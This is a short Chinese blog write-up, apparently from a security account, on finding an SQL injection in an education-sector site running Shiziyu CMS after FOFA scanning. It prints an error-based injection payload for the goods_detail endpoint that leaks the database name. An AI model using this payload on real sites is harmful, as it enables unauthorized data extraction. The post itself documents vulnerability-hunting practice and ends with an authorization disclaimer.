EDU实战-SQL注入漏洞

对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏

0x01 前景
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点
 

EDU实战-SQL注入漏洞_第1张图片


确认目标身份(使用的quake进行然后去ipc备案查询)
 

EDU实战-SQL注入漏洞_第2张图片


 

EDU实战-SQL注入漏洞_第3张图片


网站后台很像cms搭建的,在查看网站时发现

/seller.php?s=/Public/login

狮子鱼cms的特征
直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看
 

EDU实战-SQL注入漏洞_第4张图片


0x02 尝试挖掘
payload

https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

成功爆破出数据库名

EDU实战-SQL注入漏洞_第5张图片

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

点赞+在看支持一下吧~

你的点赞是我更新的动力,免费领取安全学习资料包!
https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

你可能感兴趣的:(SQL,sql,数据库,网络,web安全,网络安全)